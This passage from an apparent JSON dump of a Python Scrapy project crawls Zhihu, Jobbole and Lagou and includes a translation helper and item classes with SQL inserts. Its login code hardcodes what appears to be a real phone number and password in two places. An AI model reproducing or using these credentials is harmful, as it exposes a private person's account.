调试时这里可以加一个break,这样只会下载一个问题页面进行处理,便于分析问题\n break\n # 不是问题的页面,下载回来继续执行本函数进行分析这个页面的URL,达到深度优先\n else:\n # yield scrapy.Request(url, headers=self.header, callback=self.parse)\n pass\n\n def parse_question(self, response):\n zhihu_id = response.meta.get('question_id', '')\n\n # 使用ItemLoader加载item\n item_loader = ItemLoader(ZhihuQuestionItem(), response=response)\n item_loader.add_value('zhihu_id', zhihu_id)\n item_loader.add_css('topics', '.QuestionHeader-topics .Popover div::text')\n item_loader.add_value('url', response.url)\n item_loader.add_css('title', '.QuestionHeader-title::text')\n item_loader.add_css('content', '.QuestionHeader-detail')\n # if 'answer' in response.url:\n # item_loader.add_css('answer_num', '.Question-mainColumn a.QuestionMainAction::text')\n # else:\n # item_loader.add_css('answer_num', '.QuestionAnswers-answers .List-headerText span::text')\n # 从两种不同的样式中获取数据 可以用xpath的 | 或符号\n item_loader.add_xpath('answer_num',\n '//*[@class=\"List-headerText\"]/span/text()|//a[@class=\"QuestionMainAction\"]/text()')\n item_loader.add_css('comments_num', '.QuestionHeader-Comment button::text')\n item_loader.add_css('watch_user_num', '.QuestionFollowStatus .NumberBoard-itemValue::text')\n item_loader.add_css('click_num', '.QuestionFollowStatus 
.NumberBoard-itemValue::text')\n\n # 根据上面我们定义的规则将ItemLoader加载成question_item\n question_item = item_loader.load_item()\n\n # 如果这个问题有人回答,则发送请求获取回答信息\n # 没有回答将回答数赋值为0\n if 'answer_num' in question_item:\n # 问题页面有回答,我们拼接一个获取回答的请求,进行分析回答\n yield scrapy.Request(self.answer_url.format(zhihu_id, 0), headers=self.header, callback=self.parse_answer)\n else:\n question_item['answer_num'] = ['0']\n\n # 这里yield出去什么,scrapy会自动分析,如果是一个itme,会自动调用pipeline;如果是request会自动下载这个页面,跳转到callback函数\n yield question_item\n\n def parse_answer(self, response):\n # 回答请求返回的是json格式,可以load处理\n ans_json = json.loads(response.text)\n is_end = ans_json['paging']['is_end']\n next_url = ans_json['paging']['next']\n\n for answer in ans_json['data']:\n answer_item = ZhihuAnswerItem()\n answer_item['zhihu_id'] = answer['id']\n answer_item['url'] = answer['url']\n answer_item['question_id'] = answer['question']['id']\n answer_item['author_id'] = answer['author']['id'] if 'id' in answer['author'] else None\n answer_item['content'] = answer['content'] if 'content' in answer else answer['excerpt']\n answer_item['praise_num'] = answer['voteup_count']\n answer_item['comments_num'] = answer['comment_count']\n answer_item['create_time'] = answer['created_time']\n answer_item['update_time'] = answer['updated_time']\n # answer_item['crawl_time'] = datetime.datetime.now()\n answer_item['crawl_time'] = time.time()\n\n yield answer_item\n\n # 判断是否结束,如果没有结束进行请求next_url,next_url是json返回的\n if not is_end:\n yield scrapy.Request(next_url, headers=self.header, callback=self.parse_answer)\n\n # start_requests是spider的入口函数,循环发送start_urls数组里的url\n # 这里重写这个函数,实现登陆知乎的操作,登陆之后才能爬取知乎的内容\n # 这个函数需要返回一个数组,scrapy的代码这里需要一个可迭代的,具体没研究\n def start_requests(self):\n # 第一步需要登陆,登陆需要获取xsrf,获取xsrf可以像zhihu_login_requests.py里的get_xsrf函数那样获取\n # 也可以用scrapy异步请求一个URL,获得页面的response,然后回调一个函数,在那个函数里通过正则获取到xsrf\n\n # 以下yield return都可以 有什么区别呢\n # 初步猜测:yield多应用于循环中,循环请求一个数组中的多个url,处理完一个url后继续回到这里再发送下一个请求\n # return就直接提交里,这个函数就结束了\n # return [scrapy.Request('https://www.zhihu.com/#signin', callback=self.login, headers=self.header)]\n # yield scrapy.Request('https://www.zhihu.com/#signin', callback=self.login, headers=self.header)\n\n # 新版去掉xsrf\n return [scrapy.Request('https://www.zhihu.com/explore', callback=self.login, headers=self.header)]\n\n def login(self, response):\n match_obj = re.search('.*xsrf.*value=\"(.*?)\"', response.text)\n if match_obj:\n xsrf = match_obj.group(1)\n else:\n xsrf = '新版去掉xsrf'\n if xsrf:\n post_url = \"https://www.zhihu.com/login/phone_num\"\n post_data = {\n # '_xsrf': xsrf,\n 'phone_num': '15522523676',\n 'password': 'sun112788',\n 'remember_me': 'true'\n }\n\n # 获取验证码\n # 获取验证码图片我们需要发送一个请求,直接发送请求会导致这个请求和当前请求不在同一会话内\n # 这里用yield是为了保证验证码和登陆在一个会话内,scrapy中yield会保证在同一个会话内操作,利用callback函数衔接\n t = str(int(time.time() * 1000))\n captcha_url = 'https://www.zhihu.com/captcha.gif?r={0}&type=login'.format(t)\n yield scrapy.Request(url=captcha_url, headers=self.header,\n meta={'post_data': post_data, 'post_url': post_url}, callback=self.login_after_captcha)\n\n # 识别验证码请求返回的验证码图片中的验证码,将验证码加入的请求登陆的表单中,提交表单登陆\n def login_after_captcha(self, response):\n with open('captcha.jpg', 'wb') as f:\n f.write(response.body)\n\n # 显示图片\n im = Image.open('captcha.jpg')\n im.show()\n im.close()\n\n # 在console输入图片中的验证码\n captcha = input('输入验证码\\n>')\n\n post_url = response.meta.get('post_url', '')\n post_data = response.meta.get('post_data', {})\n post_data['captcha'] = captcha\n # FormRequest可以提供form表单的提交\n # 这里再提交一个form表单的请求,看看知乎给返回什么\n # 
我们提交的登陆请求,获取response,在callback函数里判断是否登陆成功\n # 登陆成功就可以继续执行start_requests本来需要执行的代码\n return [scrapy.FormRequest(\n url=post_url,\n formdata=post_data,\n headers=self.header,\n callback=self.check_login\n )]\n\n # 验证是否登陆成功\n def check_login(self, response):\n text_json = json.loads(response.text)\n print(text_json)\n if 'msg' in text_json and text_json['msg'] == '登录成功':\n for url in self.start_urls:\n # scrapy的所有请求如果不指定callback函数,则默认调用parse函数,默认的\n yield scrapy.Request(url, dont_filter=True, headers=self.header)\n\n\n"
},
{
"alpha_fraction": 0.45738089084625244,
"alphanum_fraction": 0.47276222705841064,
"avg_line_length": 34.45454406738281,
"blob_id": "8e57044c59725729b45717072343b83a0c9f1e4c",
"content_id": "73e44e460f4ebb75f003d5988753cde8f2e1429e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4705,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 132,
"path": "/ArticleSpider/utils/baidu_translate.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\nimport requests\nimport json\nimport sys\nimport os.path\nimport time\n\n\nclass BaiduTranslate:\n def __init__(self, query, outfile=None, type='f'):\n self.query = query\n self.outfile = outfile\n self.type = type\n self.url = 'http://fanyi.baidu.com/v2transapi'\n self.url_bing = 'https://www.bing.com/translator/api/Dictionary/Lookup?from=en&to=zh-CHS'\n self.url_bing = 'https://www.bing.com/translator/api/Translate/TranslateArray?from=-&to=zh-CHS'\n self.header = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)'\n ' Version/11.0.2 Safari/604.4.7'\n }\n self.header_bing = {\n 'Referer': 'https://www.bing.com/translator/',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Origin': 'https://www.bing.com',\n 'Host': 'www.bing.com',\n 'Accept': 'application/json,text/javascript,*/*;q=0.01',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)'\n ' Version/11.0.2 Safari/604.4.7'\n }\n self.post_date = {\n 'from': 'en',\n 'to': 'zh',\n 'query': 'test',\n 'transtype': 'translang',\n 'simple_means_flag': '3'\n }\n self.post_date_bing = {\n \"from\": \"en\",\n \"to\": \"zh-CHS\",\n }\n self.post_json_bing = json.dumps({\n \"from\": \"en\",\n \"to\": \"zh-CHS\",\n \"items\": [\n {\n # \"id\": str(int(time.time() * 1000))[10:0:-1],\n \"id\": '112785',\n \"text\": \"red\",\n \"wordAlignment\": \"\"\n }\n ]\n })\n\n def run(self):\n if self.outfile:\n with open(self.outfile, 'w')as w:\n if os.path.isfile(self.query) and self.type == 'f':\n with open(self.query, 'r') as f:\n while True:\n query = f.readline()\n if query:\n w.write(self.translate(query) + '\\n')\n else:\n break\n else:\n w.write(self.translate(self.query))\n return self.outfile\n else:\n result = ''\n if os.path.exists(self.query) and self.type == 'f':\n with open(self.query, 'r') as f:\n while True:\n query = f.readline()\n if query:\n result = result + self.translate(query) + '\\n'\n else:\n break\n else:\n result = self.translate(self.query)\n return result\n\n def translate(self, query):\n if self.check_cn(query):\n self.post_date['from'] = 'zh'\n self.post_date['to'] = 'en'\n else:\n self.post_date['from'] = 'en'\n self.post_date['to'] = 'zh'\n self.post_date['query'] = query\n response = requests.post(self.url, self.post_date, headers=self.header)\n response = response.content.decode()\n dict_response = json.loads(response)\n return dict_response['trans_result']['data'][0]['dst']\n\n def translate_bing(self, query):\n if self.check_cn(query):\n self.post_date_bing['from'] = 'zh-CHS'\n self.post_date_bing['to'] = 'en'\n self.url_bing = self.url_bing + 'en'\n else:\n self.post_date_bing['from'] = 'en'\n self.post_date_bing['to'] = 'zh-CHS'\n self.url_bing = self.url_bing + 'zh-CHS'\n # self.post_date_bing['items'][0]['text'] = query\n response = requests.post(self.url_bing, self.post_date_bing, self.post_json_bing, headers=self.header)\n response = response.content.decode()\n dict_response = json.loads(response)\n return dict_response['trans_result']['data'][0]['dst']\n\n def check_cn(self, str):\n for ch in str:\n if u'\\u4e00' <= ch <= u'\\u9fff':\n return True\n return False\n\n\nif __name__ == '__main__':\n # print(BaiduTranslate('red', None).run())\n try:\n query = sys.argv[1]\n except:\n print('请输入要翻译的内容或文件')\n exit()\n try:\n outfile = sys.argv[2]\n if not outfile.endswith('.txt'):\n outfile = None\n except:\n outfile = None\n\n print(BaiduTranslate(query, 
outfile).run())\n\n"
},
{
"alpha_fraction": 0.6264986395835876,
"alphanum_fraction": 0.6277220249176025,
"avg_line_length": 33.344539642333984,
"blob_id": "fd1b946ce144f46b85d6b2484e8311a11d128473",
"content_id": "f22774218bee11979e7ebb23fa4a0fdfbfd06fa4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8648,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 238,
"path": "/ArticleSpider/items.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\nfrom scrapy.loader.processors import MapCompose # scrapy默认提供的input_processor,可以传递任意多的函数作为参数\nfrom scrapy.loader.processors import TakeFirst # scrapy提供的函数,作用是取数组的第一个\nfrom scrapy.loader.processors import Join # scrapy提供的函数,作用是将数组按照分隔符拼接成一个字符串\nfrom scrapy.loader import ItemLoader # 可以重载这个类,自定义output_processor\nimport datetime\nimport time\nimport re\nfrom ArticleSpider.utils.common import extract_num # 公共的从字符串中提取数字\nfrom ArticleSpider.settings import SQL_DATE_FORMAT, SQL_DATETIME_FORMAT # 自定义的日期格式,用于格式化日期\nfrom w3lib.html import remove_tags\n\n\nclass ArticlespiderItem(scrapy.Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n pass\n\n\n# 演示用\ndef add_name(value):\n return value + '-zyzy'\n\n\n# 将字符串转换为时间类型\ndef date_convert(value):\n try:\n create_date = datetime.datetime.strptime(value, '%Y/%m/%d').date()\n except Exception as e:\n create_date = datetime.datetime.now().date()\n return create_date\n\n\n# 从字符串中获取数字\ndef get_nums(value):\n match_re = re.match('.*?(\\d+).*', value)\n if match_re:\n nums = int(match_re.group(1))\n else:\n nums = 0\n return nums\n\n\n# 去掉不符合规则的value,数组中每个值进行处理\ndef remove_comment_tags(value):\n if '评论' in value:\n return ''\n else:\n return value\n\n\n# 空方法,用于覆盖默认的output_processor的方法\ndef return_value(value):\n return value\n\n\n# 重载ItemLoader\nclass ArticleItemLoader(ItemLoader):\n default_output_processor = TakeFirst()\n\n\nclass JobBoleArticleItem(scrapy.Item):\n title = scrapy.Field(\n # 有两个参数,input_processor:当值传递进来当时候可以进行预处理;output_processor:当值传出时调用\n input_processor=MapCompose(lambda x: x+'-jobbole', add_name)\n )\n create_date = scrapy.Field(\n input_processor=MapCompose(date_convert)\n )\n url = scrapy.Field()\n url_object_id = scrapy.Field()\n front_image_url = scrapy.Field(\n output_processor=MapCompose(return_value) # front_image_url需要下载图片的URL,需要一个数组类型\n )\n front_image_path = scrapy.Field()\n praise_nums = scrapy.Field(\n input_processor=MapCompose(get_nums)\n )\n comment_nums = scrapy.Field(\n input_processor=MapCompose(get_nums)\n )\n fav_nums = scrapy.Field(\n input_processor=MapCompose(get_nums)\n )\n tags = scrapy.Field(\n input_processor=MapCompose(remove_comment_tags),\n output_processor=Join(',')\n )\n content = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into article(title, url, url_object_id, create_date, fav_nums)\n values (%s, %s, %s, %s, %s)\n '''\n params = (self['title'], self['url'], self['url_object_id'], self['create_date'], self['fav_nums'])\n\n return insert_sql, params\n\n\nclass ZhihuQuestionItem(scrapy.Item):\n zhihu_id = scrapy.Field()\n topics = scrapy.Field()\n url = scrapy.Field()\n title = scrapy.Field()\n content = scrapy.Field()\n answer_num = scrapy.Field()\n comments_num = scrapy.Field()\n watch_user_num = scrapy.Field()\n click_num = scrapy.Field()\n crawl_time = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into zhihu_question(zhihu_id, topics, url, title, content, answer_num, comments_num, watch_user_num, \n click_num, crawl_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \n on duplicate key UPDATE content=VALUES(content), answer_num=VALUES(answer_num), \n comments_num=VALUES(comments_num), watch_user_num=VALUES(watch_user_num), click_num=VALUES(click_num),\n crawl_update_time=VALUES(crawl_time)\n '''\n\n # 
这个item是用ItemLoader加载的item,每一项都是list,可以像JobBoleArticleItem那样处理\n # 也可以自己手动处理\n zhihu_id = self['zhihu_id'][0]\n topics = ','.join(self['topics'])\n url = self['url'][0]\n title = self['title'][0]\n content = self['content'][0]\n answer_num = extract_num((''.join(self['answer_num']).replace(',', '')))\n comments_num = extract_num((''.join(self['comments_num']).replace(',', '')))\n watch_user_num = extract_num(self['watch_user_num'][0].replace(',', ''))\n click_num = extract_num(self['click_num'][1].replace(',', ''))\n crawl_time = datetime.datetime.now().strftime(SQL_DATETIME_FORMAT)\n\n params = (zhihu_id, topics, url, title, content, answer_num, comments_num, watch_user_num,\n click_num, crawl_time)\n\n return insert_sql, params\n\n\nclass ZhihuAnswerItem(scrapy.Item):\n zhihu_id = scrapy.Field()\n url = scrapy.Field()\n question_id = scrapy.Field()\n author_id = scrapy.Field()\n content = scrapy.Field()\n praise_num = scrapy.Field()\n comments_num = scrapy.Field()\n create_time = scrapy.Field()\n update_time = scrapy.Field()\n crawl_time = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into zhihu_answer(zhihuid, url, question_id, author_id, content, praise_num, comments_num, \n create_time, update_time, crawl_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n on duplicate KEY UPDATE content=VALUES(content), praise_num=VALUES(praise_num), \n comments_num=VALUES(comments_num), update_time=VALUES(update_time), crawl_update_time=VALUES(crawl_time)\n '''\n\n create_time = time.strftime(SQL_DATETIME_FORMAT, time.localtime(self['create_time']))\n update_time = time.strftime(SQL_DATETIME_FORMAT, time.localtime(self['update_time']))\n crawl_time = time.strftime(SQL_DATETIME_FORMAT, time.localtime(self['crawl_time']))\n\n params = (self['zhihu_id'], self['url'], self['question_id'], self['author_id'], self['content'],\n self['praise_num'], self['comments_num'], create_time, update_time, crawl_time)\n\n return insert_sql, params\n\n\nclass LagouJobItemLoader(ItemLoader):\n default_output_processor = TakeFirst()\n\n\ndef remove_splash(value):\n return value.replace('/', '')\n\n\ndef str_strip(value):\n return value.strip()\n\n\nclass LagouJobItem(scrapy.Item):\n url = scrapy.Field()\n url_object_url = scrapy.Field()\n title = scrapy.Field()\n salary = scrapy.Field()\n job_city = scrapy.Field(\n input_processor=MapCompose(remove_splash),\n )\n work_year = scrapy.Field(\n input_processor=MapCompose(remove_splash),\n )\n degree_need = scrapy.Field(\n input_processor=MapCompose(remove_splash),\n )\n job_type = scrapy.Field()\n publish_time = scrapy.Field()\n tags = scrapy.Field(\n output_processor=Join(',')\n )\n job_advantage = scrapy.Field()\n job_desc = scrapy.Field(\n input_processor=MapCompose(remove_tags),\n )\n job_addr = scrapy.Field(\n input_processor=MapCompose(str_strip),\n output_processor=Join('')\n )\n company_url = scrapy.Field()\n company_name = scrapy.Field()\n crawl_time = scrapy.Field()\n crawl_update_time = scrapy.Field()\n\n def get_insert_sql(self):\n insert_sql = '''\n insert into lagou_job(url, url_object_url, title, salary, job_city, work_year, degree_need, \n job_type, publish_time, tags, job_advantage, job_desc, job_addr, company_url, company_name, crawl_time) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n on duplicate KEY UPDATE salary=VALUES(salary), job_city=VALUES(job_city), work_year=VALUES(work_year),\n degree_need=VALUES(degree_need), publish_time=VALUES(publish_time), crawl_update_time=VALUES(crawl_time)\n 
'''\n\n crawl_time = self['crawl_time'].strftime(SQL_DATETIME_FORMAT)\n\n params = (self['url'], self['url_object_url'], self['title'], self['salary'], self['job_city'],\n self['work_year'], self['degree_need'], self['job_type'], self['publish_time'], self['tags'],\n self['job_advantage'], self['job_desc'], self['job_addr'], self['company_url'], self['company_name'],\n crawl_time)\n\n return insert_sql, params\n"
},
{
"alpha_fraction": 0.6271941065788269,
"alphanum_fraction": 0.655750572681427,
"avg_line_length": 29.535999298095703,
"blob_id": "cb22b7402530896c2adae5936d4ae9ae3789b403",
"content_id": "001f552605b5b146e1aa5fc9548104de95546f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4871,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 125,
"path": "/ArticleSpider/utils/zhihu_login_requests.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\n'''\n requests模拟登陆知乎,包括使用cookie自动登陆\n'''\n\nimport requests # requsets模块 发送请求 可百度requests文档学习\ntry:\n import cookielib # python2 cookielib相关模块\nexcept:\n import http.cookiejar as cookielib # python3 这样写可以实现python2和python3兼容\nimport re\nimport shutil #\nimport time # 时间模块,这里用于生成随机数\nfrom PIL import Image # 这里用来打开图片\n\n\n# 会话对象,能够跨请求保持某些参数,它也会在同一个 Session 实例发出的所有请求之间保持cookie\nsession = requests.session()\n\n\n# LWPCookieJar是python中管理cookie的工具,可以将cookie保存到文件,或者在文件中读取cookie数据到程序\nsession.cookies = cookielib.LWPCookieJar(filename='cookies.txt') # 调用这个的save方法可以将cookie存储到filename的文件中\ntry:\n session.cookies.load(ignore_discard=True) # 调用load读取cookie文件,ignore_discard=True忽略关闭浏览器丢失,ignore_expires=True忽略失效\nexcept:\n print('cookie未能加载')\n\n\n# 这里要自己定义一个请求的header,默认的是python的header,网站服务器会筛选是哪里发来的请求,这里模仿浏览器发送的请求\n# agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.7'\nagent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\nheader = {\n 'HOST': 'www.zhihu.com',\n 'Referer': 'https://www.zhihu.com',\n 'User-Agent': agent\n}\n\n\n# 获取_xsrf,xsrf是服务器生成的,传递给浏览器,浏览器发送特定请求需要带着xsrf才可以请求成功,这个xsrf可以在html中隐藏域中获取\ndef get_xsrf():\n response = session.get('https://www.zhihu.com', headers=header) # 这里注意headers参数,我们要自定义header,模拟浏览器\n # response.text 是服务器返回的html页面,其中就有xsrf,<input type=\"hidden\" name=\"_xsrf\" value=\"5903a96c29735c6a0eb8e3bd99d15ee0\"/>\n # 我们可以用正则将xsrf匹配出来,因为match只能匹配单行,有换行符就无法成功匹配,所以这里用search\n # 也可以用match,match有一个参数re.DOTALL(或re.S)使得 . 匹配包括换行符在内的任意字符\n match_obj = re.search('.*xsrf.*value=\"(.*?)\"', response.text)\n if match_obj:\n print(match_obj.group(1))\n return match_obj.group(1)\n else:\n return ''\n\n\n# 验证码模块,获取验证码图片\ndef get_captcha():\n t = str(int(time.time()*1000))\n captcha_url = 'https://www.zhihu.com/captcha.gif?r={0}&type=login'.format(t)\n # 这里要用session请求,session会保存cookie,保证验证码是当前登陆会话的,\n # 不能用request,request请求回来的是不同会话的,验证码无法校验成功\n t = session.get(captcha_url, headers=header)\n with open('captcha.jpg', 'wb') as f:\n f.write(t.content)\n\n # 显示图片\n im = Image.open('captcha.jpg')\n im.show()\n im.close()\n\n # 在console输入图片中的验证码\n captcha = input('输入验证码\\n')\n return captcha\n\n\ndef zhihu_login(account, password):\n if re.match('^1\\d{10}', account):\n print('手机号码登陆')\n post_url = \"https://www.zhihu.com/login/phone_num\"\n post_data = {\n '_xsrf': get_xsrf(),\n 'phone_num': account,\n 'password': password,\n 'captcha': get_captcha()\n # 'captcha_type': 'cn'\n }\n elif '@' in account:\n print('邮箱登陆')\n post_url = \"https://www.zhihu.com/login/email\"\n post_data = {\n '_xsrf': get_xsrf(),\n 'email': account,\n 'password': password\n # 'captcha_type': 'cn'\n }\n response_text = session.post(post_url, post_data, headers=header)\n print(response_text.text)\n session.cookies.save() # 保存cookie信息到本地\n\n\n# 获取主页\ndef get_index():\n response = session.get('https://www.zhihu.com', headers=header)\n with open('index_page.html', 'wb') as f:\n f.write(response.text.encode('utf-8'))\n print('ok')\n\n\n# 判断是否登陆\ndef is_login():\n inbox_url = 'https://www.zhihu.com/inbox' # 私信页面\n # allow_redirects=False是否重定向为False,否则302会重定向到登陆界面,返回码变成200,无法判断是否是登陆状态\n response = session.get(inbox_url, headers=header, allow_redirects=False)\n if response.status_code != 200:\n print('未登录')\n return False\n else:\n print('已登录')\n return True\n\n\nzhihu_login('15522523676', 'sun112788')\n# get_index()\n# 
is_login()\n# get_xsrf()\n# get_captcha()\n"
},
{
"alpha_fraction": 0.585383415222168,
"alphanum_fraction": 0.5931520462036133,
"avg_line_length": 42.431251525878906,
"blob_id": "b51f67142ad3432c4fed28b6cdbd6d39b6849883",
"content_id": "cc14da43e2d5bd80e18e4ca0f8d7cc2a62ed387b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9304,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 160,
"path": "/ArticleSpider/spiders/jobbole.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nimport datetime\nfrom scrapy.http import Request # 用于发送请求\nfrom urllib import parse # parse.urljoin(response.url, post_url) 用于拼接URL,如果post_url没有域名,则提取response.url的URL\nfrom ArticleSpider.items import JobBoleArticleItem, ArticleItemLoader # ArticleItemLoader为重载的ItemLoader,自定义类output_processor\nfrom ArticleSpider.utils import common\nfrom scrapy.loader import ItemLoader # ItemLoader是scrapy提供的加载item的模块,ItemLoader可以自定义一些规则,然后根据这些规则解析生成item\n\n\nclass JobboleSpider(scrapy.Spider):\n name = 'jobbole'\n allowed_domains = ['blog.jobbole.com']\n start_urls = ['http://blog.jobbole.com/all-posts/'] # 所有文章页面作为入口页面\n\n def parse(self, response):\n \"\"\"\n 这个函数是由start_requests函数调起的,start_requests是spider的入口函数\n start_requests函数会逐条发送start_urls这个数组里的url请求,默认的callback函数就是这个parse函数\n response是请求返回的内容\n :param response:\n :return:\n \"\"\"\n\n # 已经获取到了全部文章页面的response,我们从这个页面解析出所有具体文章的链接,\n # 再发送这个链接请求,就可以获取到文章页面的response,\n # 从文章页面的response就可以解析出文章相关内容,然后保存到数据库\n\n # css选择器,一层一层的获取,从前往后,最外层到最内层具体要爬取的内容\n # #archive id为archive的div\n # .floated-thumb class包含floated-thumb的div\n # .post-thumb class包含post-thumb的div\n # a 所有的a标签\n # 获取到这里没有进行extract啥也看不出来,不进行extract是因为既要提取出当前层a的链接地址,还要提取出下一层的img的src\n post_nodes = response.css(\"#archive .floated-thumb .post-thumb a\")\n for post_node in post_nodes:\n # 逐条再次解析\n # 获取下层img标签的src属性值\n img_url = post_node.css('img::attr(src)').extract_first('')\n # 获取当前层a标签的href属性值\n post_url = post_node.css('::attr(href)').extract_first('')\n # 想要爬取的文件链接取出来来,下面异步请求这个页面,返回的内容response在callback函数内爬取并存储到数据库\n # 参数说明: url是发送的请求;\n # parse.urljoin这个函数可以智能拼接URL\n # 如获取到的文章链接是/113367/,调用这个函数会将两个url拼接在一起,变成http://blog.jobbole.com/113367/\n # 如获取到的文章链接是http://blog.jobbole.com/113367/,就不会拼接了\n # callback是处理这个请求的函数名,异步处理的;\n # meta是我们自定义的加到request里的字段,在处理函数中从response中获取,meta是个字典\n yield Request(url=parse.urljoin(response.url, post_url), meta={'front_image_url': img_url},\n callback=self.parse_detail)\n\n # 提取下一页URL\n # 当前页能提取到的文章url都爬取完了之后,需要爬取下一页的文章url\n # 这里我们需要模拟点击下一页,也就是发送一个下一页链接请求,将点击后返回的response交给callback函数处理,\n # 这个的callback函数是当前函数,也就是一个循环,直到无法获取下一页的url为止\n next_urls = response.css('.next.page-numbers::attr(href)').extract_first('')\n if next_urls:\n yield Request(url=parse.urljoin(response.url, next_urls), callback=self.parse)\n\n def parse_detail(self, response):\n \"\"\"\n 这个函数用来解析具体的文章页,response就是点击文章链接后返回的文章页面内容,我们需要处理的\n \"\"\"\n\n # 提取的内容需要存放到数据库,这个对象是和数据库表对应的一个对象,scrapy叫它item\n article_item = JobBoleArticleItem()\n\n # ———————————第一种生成item的方法:逐个获取,然后处理数据,最后放在item里(item因为第二种方法已经改动了)———————————————\n\n # 获取自定义的字段,从meta中获取\n front_image_url = response.meta.get('front_image_url', '')\n\n # 使用xpath获取字段\n # title = response.xpath('//*[@id=\"post-112886\"]/div[1]/h1/text()').extract()[0]\n # vote = int(response.xpath('//span[contains(@class, \"vote-post-up\")]/h10/text()').extract()[0])\n\n # 使用css选择器提取字段\n\n # 获取标题\n title2 = response.css('div.entry-header > h1::text').extract_first('')\n\n # 获取创建日期\n create_date = response.css('p.entry-meta-hide-on-mobile::text').extract()[0].strip().replace('·', '').strip()\n\n # 获取点赞数\n praise_nums = int(response.css('span.vote-post-up > h10::text').extract()[0])\n\n # 获取收藏数\n fav_nums = response.css('span.bookmark-btn::text').extract()[0].strip()\n match_re = re.match('.*?(\\d+).*', fav_nums)\n if match_re:\n fav_nums = int(match_re.group(1))\n else:\n fav_nums = 0\n\n # 获取评论数\n comment_nums = response.css('a[href=\"#article-comment\"] > span::text').extract()[0].strip()\n match_re = 
re.match('.*?(\\d+).*', comment_nums)\n if match_re:\n comment_nums = int(match_re.group(1))\n else:\n comment_nums = 0\n\n # 获取文章内容\n content = response.css('div.entry').extract()[0]\n\n # 获取标签\n tags = response.css('p.entry-meta-hide-on-mobile a::text').extract()\n tag_list = [tag for tag in tags if not tag.strip().endswith('评论')]\n tags = ','.join(tag_list)\n\n article_item['title'] = title2\n try:\n create_date = datetime.datetime.strptime(create_date, '%Y/%m/%d').date()\n except Exception as e:\n create_date = datetime.datetime.now().date()\n article_item['create_date'] = create_date\n article_item['url'] = response.url\n article_item['url_object_id'] = common.get_md5(response.url)\n article_item['front_image_url'] = [front_image_url]\n article_item['praise_nums'] = praise_nums\n article_item['comment_nums'] = comment_nums\n article_item['fav_nums'] = fav_nums\n article_item['tags'] = tags\n article_item['content'] = content\n\n # ——————————————————————————————————————————————————————————————————————————————————————————————————————————————\n # ———————第二种加载item的方法:通过itemloader加载item,好处是数据的处理统一放到了item类中去处理,减少代码量,增强可读性————\n # ——————————————————————————————————————————————————————————————————————————————————————————————————————————————\n '''\n 思路:\n 1,创建一个ItemLoad对象 \n 2,通过该对象的add_css或者add_xpath或者add_value方法将解析语句装入ItemLoader\n 3,在Item.py中在Filder()中调用函数,用来清洗,处理数据\n 4,artical_item = item_loader.load_item() 调用这个对象的此方法,写入到Item中\n '''\n # item_loader = ItemLoader(item=JobBoleArticleItem(), response=response)\n item_loader = ArticleItemLoader(item=JobBoleArticleItem(), response=response) # 自定义的itemloader\n '''\n ItemLoader重要的方法有下面这三个\n item_loader.add_css()\n item_loader.add_xpath()\n item_loader.add_value()\n '''\n item_loader.add_css('title', 'div.entry-header > h1::text')\n item_loader.add_css('create_date', 'p.entry-meta-hide-on-mobile::text')\n item_loader.add_value('url', response.url)\n item_loader.add_value('url_object_id', common.get_md5(response.url))\n item_loader.add_value('front_image_url', [front_image_url])\n item_loader.add_css('praise_nums', 'span.vote-post-up > h10::text')\n item_loader.add_css('comment_nums', 'a[href=\"#article-comment\"] > span::text')\n item_loader.add_css('fav_nums', 'span.bookmark-btn::text')\n item_loader.add_css('tags', 'p.entry-meta-hide-on-mobile a::text')\n item_loader.add_css('content', 'div.entry')\n\n # 添加以上这些规则后需要调用一个load_item方法,将这些规则解析成item\n article_item = item_loader.load_item()\n\n yield article_item\n\n\n"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 11.5,
"blob_id": "12d1cbf2c1927d8fa8290836a249a5ddf9e7e204",
"content_id": "87b85bb587f2094134e76065e07855f0b6dc7868",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 29,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 2,
